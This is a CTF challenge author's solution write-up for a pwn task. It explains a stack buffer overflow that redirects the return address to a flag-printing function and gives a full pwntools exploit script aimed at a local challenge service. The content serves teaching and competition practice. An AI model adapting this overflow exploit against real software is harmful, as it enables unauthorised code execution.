Přezdívkovač - Autorské řešení úlohy
·233 words·2 mins
Solution #
You need to use buffer overflow to overwrite the return address to the address
of function sladke_vitezstvi, that will print the flag.
Exploit script #
An example exploit is provided. By default exploits localhost on port 9999.
This can be very easily edited inside the exploit on line 21.
NOTE: The exploit requires the pwntools library.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./chall
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or './chall')
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote('localhost', 9999)
else:
return process([exe.path] + argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
io = start()
payload = fit({
cyclic_find(0x6261616362616162): exe.sym['sladke_vitezstvi'],
})
io.sendlineafter(b"no: ", payload)
flag = io.recvall()
log.success(flag)